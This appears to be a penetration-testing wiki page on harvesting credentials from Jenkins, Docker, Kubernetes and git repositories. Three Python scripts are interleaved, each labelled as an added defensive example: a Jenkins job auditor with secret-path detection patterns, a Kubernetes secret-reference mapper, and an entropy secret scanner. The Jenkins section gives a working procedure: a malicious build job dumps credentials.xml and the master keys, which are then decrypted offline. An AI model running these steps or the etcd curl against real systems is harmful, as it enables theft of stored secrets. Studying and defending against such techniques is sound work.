## JENKINS

SCENARIO: You've obtained credentials for a user with build job privileges on a Jenkins server. With that user you can now dump all the credentials on the Jenkins server and decrypt them by creating a malicious build job.

### STEP 1: Log into the Jenkins server with the obtained user account

https://<Jenkins_IPAddr>/script/

### STEP 2: Create the build job

Find an obscure location to run your build job and follow the navigational tree below:

New Item -> Freeform Build "New Project" -> Configure -> General -> Restrict Where This Is Run -> Enter "Master" -> Build -> Add Build Step -> Execute Shell

### STEP 3: Execute the following commands in the shell

```shell
echo "credentials.xml"
cat "${JENKINS_HOME}/credentials.xml"
echo ""
echo "master.key"
cat "${JENKINS_HOME}/secrets/master.key" | base64 -w 0
echo ""
echo "hudson.util.Secret"
cat "${JENKINS_HOME}/secrets/hudson.util.Secret" | base64 -w 0
```

### STEP 4: Run the job

Save the build job, then from the "Jobs" view page click "Build Now".

### STEP 5: Build History

Navigate to "Build History" and click on your build job number. Then click on "Console Output".
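From the defender's side, the job created in steps 2 to 5 leaves a durable trace: Jenkins persists every freestyle job as `$JENKINS_HOME/jobs/<name>/config.xml`, with the "Execute shell" step stored under `hudson.tasks.Shell/command` and the node restriction under `assignedNode`. The following audit script is an added example, not part of the original page or of Jenkins itself; it parses such config files and flags shell steps that read `credentials.xml` or the `secrets/` directory, and jobs pinned to the controller node. The sample config is constructed, and the regex list and node names are assumptions to tune for your own instance.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Paths a build step should never need to read (assumed list; extend as needed).
SECRET_PATH_PATTERNS = [
    r"credentials\.xml",
    r"secrets/master\.key",
    r"secrets/hudson\.util\.Secret",
    r"\$\{?JENKINS_HOME\}?/secrets",
]

# Node labels that mean "run on the controller", where JENKINS_HOME is readable.
CONTROLLER_NODE_NAMES = ("master", "built-in")

# Constructed sample: the shape Jenkins writes for a freestyle job whose
# single "Execute shell" step is the command list from STEP 3.
SAMPLE_CONFIG_XML = """<project>
  <description></description>
  <assignedNode>master</assignedNode>
  <canRoam>false</canRoam>
  <builders>
    <hudson.tasks.Shell>
      <command>cat ${JENKINS_HOME}/credentials.xml
cat ${JENKINS_HOME}/secrets/master.key | base64 -w 0
cat ${JENKINS_HOME}/secrets/hudson.util.Secret | base64 -w 0</command>
    </hudson.tasks.Shell>
  </builders>
</project>
"""


def audit_job_config(xml_text, job_name="<unknown>"):
    """Return a list of (job_name, reason) findings for one config.xml."""
    findings = []
    root = ET.fromstring(xml_text)

    # A job restricted to the controller can read JENKINS_HOME directly,
    # so note that even when no secret path shows up in the command.
    node = (root.findtext("assignedNode") or "").strip()
    if node.lower() in CONTROLLER_NODE_NAMES:
        findings.append((job_name, f"job pinned to controller node '{node}'"))

    # Each shell step is reported once per matching pattern.
    for step in root.iter("hudson.tasks.Shell"):
        command = step.findtext("command") or ""
        for pattern in SECRET_PATH_PATTERNS:
            match = re.search(pattern, command)
            if match:
                findings.append((job_name, f"shell step references {match.group(0)}"))
    return findings


def audit_jobs_dir(jobs_dir):
    """Walk <JENKINS_HOME>/jobs/<name>/config.xml and collect all findings."""
    findings = []
    for cfg in sorted(Path(jobs_dir).glob("*/config.xml")):
        findings.extend(audit_job_config(cfg.read_text(), cfg.parent.name))
    return findings


if __name__ == "__main__":
    for job, reason in audit_job_config(SAMPLE_CONFIG_XML, "demo-job"):
        print(f"[{job}] {reason}")
```

Run it against a copy of the `jobs/` directory (`audit_jobs_dir("/var/lib/jenkins/jobs")`) or feed it the `config.xml` bodies fetched through the Jenkins REST API on a schedule; pipeline jobs store their script under a different element and need a second rule.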
### STEP 6: Credentials.xml

Copy the text of the "credentials.xml" output and place it into a local file on your attack workstation named "credentials.xml".

### STEP 7: Encoded Keys

Copy the base64 encoded "master.key" and "hudson.util.Secret" and decode them into their own files on your local attack workstation:

```shell
echo "<base64 string master.key>" | base64 --decode > master.key
echo "<base64 string hudson.util.Secret>" | base64 --decode > hudson.util.Secret
```

### STEP 8: Jenkins-decrypt

Download the "jenkins-decrypt" python script:

https://github.com/tweksteen/jenkins-decrypt

### STEP 9: Decrypt keys

Decrypt the "credentials.xml" file using "master.key" and "hudson.util.Secret":

```bash
decrypt.py <master.key> <hudson.util.Secret> <credentials.xml>
```

## DOCKER

If you gain access to a Docker container you can check the following locations for possible plaintext or encoded Docker passwords, api_tokens, etc. that the container is using for external services.

You may be able to see Docker secret locations or names by issuing:

```bash
$ docker secret ls
```

Depending on the OS your target Docker container is running, you can check the following locations for secret files or mounts.

#### Linux Docker Secrets Locations

`/run/secrets/<secret_name>`

#### Windows Docker Secrets Locations

`C:\ProgramData\Docker\internal\secrets`

`C:\ProgramData\Docker\secrets`

## KUBERNETES

#### SECRETS FILE LOCATIONS

In Kubernetes, secrets such as passwords, api_tokens, and SSH keys are stored in a "Secret" object. You can query what secrets are stored by issuing:

```bash
$ kubectl get secrets
$ kubectl describe secrets/<Name>
```

To decode a secret username or password perform the following:

```bash
$ echo '<base64_username_string>' | base64 --decode
$ echo '<base64_password_string>' | base64 --decode
```

Also be on the lookout for volume mount points where secrets can be stored as well and referenced by the pod.
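The two `base64 --decode` lines above cover one key at a time; when auditing a namespace it is more useful to decode a whole Secret object and to list every place a pod pulls secrets in (env `secretKeyRef`, `envFrom.secretRef`, and `secret` volumes with their mount paths), which is what the last sentence warns about. The script below is an added example, not part of the original page or of kubectl; it works on the JSON that `kubectl get secret <name> -o json` and `kubectl get pod <name> -o json` print. Both sample objects are constructed, the secret values are placeholders, and the output tuple format is this example's own choice.

```python
import base64
import json

# Constructed sample of `kubectl get secret db-creds -o json` (metadata trimmed).
# "username" and "password" are base64 of placeholder text; "blob" is two
# bytes (0xff 0xfe) that are not valid UTF-8, to exercise the binary branch.
SAMPLE_SECRET = json.loads("""{
  "apiVersion": "v1",
  "kind": "Secret",
  "metadata": {"name": "db-creds", "namespace": "default"},
  "type": "Opaque",
  "data": {
    "username": "YWRtaW4=",
    "password": "czNjcjN0LXB3",
    "blob": "//4="
  }
}""")

# Constructed sample of `kubectl get pod web -o json` (status and most
# metadata trimmed) that references secrets in all three supported ways.
SAMPLE_POD = json.loads("""{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {"name": "web", "namespace": "default"},
  "spec": {
    "containers": [{
      "name": "app",
      "image": "example/app:1.0",
      "env": [{"name": "DB_PASS",
               "valueFrom": {"secretKeyRef": {"name": "db-creds", "key": "password"}}}],
      "envFrom": [{"secretRef": {"name": "api-tokens"}}],
      "volumeMounts": [{"name": "tls", "mountPath": "/etc/tls"}]
    }],
    "volumes": [{"name": "tls", "secret": {"secretName": "web-tls"}}]
  }
}""")


def decode_secret(secret):
    """Decode every entry of a Secret's data map into text.

    Values that are not valid UTF-8 (certificates in DER form, raw keys) are
    reported as a length marker rather than dumped as bytes.
    """
    decoded = {}
    for key, b64 in (secret.get("data") or {}).items():
        raw = base64.b64decode(b64)
        try:
            decoded[key] = raw.decode("utf-8")
        except UnicodeDecodeError:
            decoded[key] = f"<binary, {len(raw)} bytes>"
    # stringData only appears in manifests, never in API output, and is plaintext.
    decoded.update(secret.get("stringData") or {})
    return decoded


def secret_refs(pod):
    """Return sorted (kind, secret_name, detail) tuples for every secret a pod uses."""
    spec = pod.get("spec", {})
    refs = []
    mounts = {}  # volume name -> list of mount paths across containers
    containers = spec.get("containers", []) + spec.get("initContainers", [])
    for c in containers:
        for vm in c.get("volumeMounts", []):
            mounts.setdefault(vm["name"], []).append(vm["mountPath"])
        for env in c.get("env", []):
            ref = env.get("valueFrom", {}).get("secretKeyRef")
            if ref:
                refs.append(("env", ref["name"], f"{env['name']}<-{ref['key']}"))
        for ef in c.get("envFrom", []):
            ref = ef.get("secretRef")
            if ref:
                refs.append(("envFrom", ref["name"], c["name"]))
    for vol in spec.get("volumes", []):
        if "secret" in vol:
            paths = ",".join(mounts.get(vol["name"], [])) or "<not mounted>"
            refs.append(("volume", vol["secret"]["secretName"], paths))
    return sorted(refs)


if __name__ == "__main__":
    print(decode_secret(SAMPLE_SECRET))
    for kind, name, detail in secret_refs(SAMPLE_POD):
        print(f"{kind:8} {name:12} {detail}")
```

Piping `kubectl get pods -A -o json` into `secret_refs` for each item gives a namespace-wide map of which workloads can read which Secret, which is the list to compare against RBAC and against what the application actually needs.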
### CREDS EXPOSURE

Also in Kubernetes you may get lucky and find the etcd client port 2379 exposed and misconfigured. Performing a GET on a specific resource may expose passwords for the pod or cluster.

### STEP 1: Perform a GET on the following Kubernetes path

```shell
curl 'http://<Kube_IPAddr>:2379/v2/keys/?recursive=true'
```

### STEP 2: Look through the returned results

Identify possible credentials or kubelet tokens in the output.

## GIT REPOS

It's advantageous to search git repos like Github or Gitlab for exposed credentials, api keys, and other authentication methods.

### TRUFFLE HOG

https://github.com/dxa4481/truffleHog

### STEP 1: Install

```bash
pip install truffleHog
```

### STEP 2: Point it at a git repo or local branches

```bash
truffleHog --regex --entropy=False https://github.com/someco/example.git
truffleHog file:///user/someco/codeprojects/example/
```

### GITROB

Gitrob will clone repos to moderate depth and then iterate through commit histories, flagging files that match potentially sensitive content.

https://github.com/michenriksen/gitrob

https://github.com/michenriksen/gitrob/releases

### STEP 1: Download precompiled gitrob release

### STEP 2: Login and generate/copy your GITHUB access token

https://github.com/settings/tokens

### STEP 3: Launch Gitrob in analyze mode

```bash
gitrob analyze <username> --site=https://github.example.com --endpoint=https://github.example.com/api/v3 --access-tokens=token1,token2
```

[[Home]] #howto
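The truffleHog invocation above switches between two detection modes (`--regex` for known credential shapes, `--entropy` for random-looking strings). Running the same two checks on your own repositories before they are pushed, as a pre-commit hook or a CI step, is the defensive counterpart. The scanner below is an added example, not truffleHog's code or the page's own; it implements a Shannon-entropy test on base64- and hex-looking tokens plus two regex rules, and can walk a local repository's full history with `git log -p --all`. The thresholds, the rule list and the sample text are assumptions (the AWS key in the sample is the placeholder value from AWS's own documentation, not a real key).

```python
import math
import re
import subprocess

# Candidate tokens: runs of base64 or hex characters at least 20 long.
BASE64_CHARS = re.compile(r"[A-Za-z0-9+/=]{20,}")
HEX_CHARS = re.compile(r"[0-9a-fA-F]{20,}")
# Entropy thresholds in bits per character (assumed values; tune per code base).
BASE64_THRESHOLD = 4.5
HEX_THRESHOLD = 3.0

# Regex rules for credential shapes that are low-entropy but still secrets.
REGEX_RULES = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private-key-header": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
}

# Constructed sample "diff": one regex hit, one high-entropy base64 token,
# one hex digest, one low-entropy string and one ordinary value.
SAMPLE_TEXT = """\
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
api_token = "aB3dE5fG7hI9jK1lM2nO4pQ6rS8tU0vW"
build_hash = "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
padding = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
version = "1.2.3"
"""


def shannon_entropy(s):
    """Bits of entropy per character of s, computed from its own symbol frequencies."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_text(text):
    """Return sorted (line_no, rule, token) findings for a block of text."""
    findings = set()
    for line_no, line in enumerate(text.splitlines(), 1):
        for rule, rx in REGEX_RULES.items():
            for m in rx.finditer(line):
                findings.add((line_no, rule, m.group(0)))
        # Hex is checked with its own (lower) threshold because the alphabet
        # has only 16 symbols; a base64 token can never exceed 6 bits/char.
        for m in HEX_CHARS.finditer(line):
            if shannon_entropy(m.group(0)) > HEX_THRESHOLD:
                findings.add((line_no, "high-entropy-hex", m.group(0)))
        for m in BASE64_CHARS.finditer(line):
            if shannon_entropy(m.group(0)) > BASE64_THRESHOLD:
                findings.add((line_no, "high-entropy-base64", m.group(0)))
    return sorted(findings)


def scan_repo_history(repo_dir):
    """Scan every patch in a local repo's history (all branches).

    Line numbers refer to the combined `git log -p` output, so the caller
    maps them back to commits; deleted secrets are still found, which is
    the point of looking at history rather than the working tree.
    """
    out = subprocess.run(
        ["git", "-C", repo_dir, "log", "-p", "--all"],
        capture_output=True, text=True, check=True,
    ).stdout
    return scan_text(out)


if __name__ == "__main__":
    for line_no, rule, token in scan_text(SAMPLE_TEXT):
        print(f"line {line_no}: {rule}: {token}")
```

Note that the AWS sample key has entropy well under the base64 threshold and is caught only by the regex rule, while the hex digest is caught only by the entropy test; the second case is also the main source of false positives (commit hashes, checksums), which is why truffleHog's `--entropy=False` exists and why a real deployment carries an allow-list.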